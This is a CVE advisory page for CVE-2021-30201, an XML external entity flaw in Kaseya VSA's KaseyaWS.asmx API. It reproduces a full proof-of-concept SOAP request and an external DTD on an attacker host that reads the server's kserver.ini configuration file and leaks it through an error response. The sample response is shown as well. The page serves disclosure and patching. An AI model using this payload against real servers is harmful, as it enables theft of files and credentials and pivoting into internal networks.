CVE-2021-30201
Last modified
CVE-2021-30201 is a high-severity vulnerability rated 7.5/10 on the CVSS scale. The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. EPSS estimates a 25.26% chance of exploitation in the next 30 days.
Description
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Kaseya | Vsa | < 9.5.6 |
References
- https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/Patch, Third Party Advisory
- https://csirt.divd.nl/CVE-2021-30201Exploit, Third Party Advisory
- https://csirt.divd.nl/DIVD-2021-00011Patch, Third Party Advisory
- https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021Release Notes, Vendor Advisory
- https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/Patch, Third Party Advisory
- https://csirt.divd.nl/CVE-2021-30201Exploit, Third Party Advisory
- https://csirt.divd.nl/DIVD-2021-00011Patch, Third Party Advisory
- https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021Release Notes, Vendor Advisory
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2021-30201?
How severe is CVE-2021-30201?
How do I fix CVE-2021-30201?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2021
- CVE-2021-30192CODESYS V2 Web-Server before 1.1.9.20 has an Improperly Impl…9.8
- CVE-2021-30193CODESYS V2 Web-Server before 1.1.9.20 has an Out-of-bounds W…9.8
- CVE-2021-30194CODESYS V2 Web-Server before 1.1.9.20 has an Out-of-bounds R…9.1
- CVE-2021-30195CODESYS V2 runtime system before 2.4.7.55 has Improper Input…7.5
- CVE-2021-30199In filters/reframe_latm.c in GPAC 1.0.1 there is a Null Poin…5.5
- CVE-2021-3020An issue was discovered in ClusterLabs Hawk (aka HA Web Kons…8.8
- CVE-2021-30203A reflected cross-site scripting (XSS) vulnerability in the …6.1
- CVE-2021-30205Incorrect access control in the component /index.php?mod=sys…5.3
- CVE-2021-30209Textpattern V4.8.4 contains an arbitrary file upload vulnera…6.5
- CVE-2021-3021ISPConfig before 3.2.2 allows SQL injection.9.8
- CVE-2021-30211Knowage Suite 7.3 is vulnerable to Stored Cross-Site Scripti…5.4
- CVE-2021-30212Knowage Suite 7.3 is vulnerable to Stored Cross-Site Scripti…5.4
Are you affected by CVE-2021-30201?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
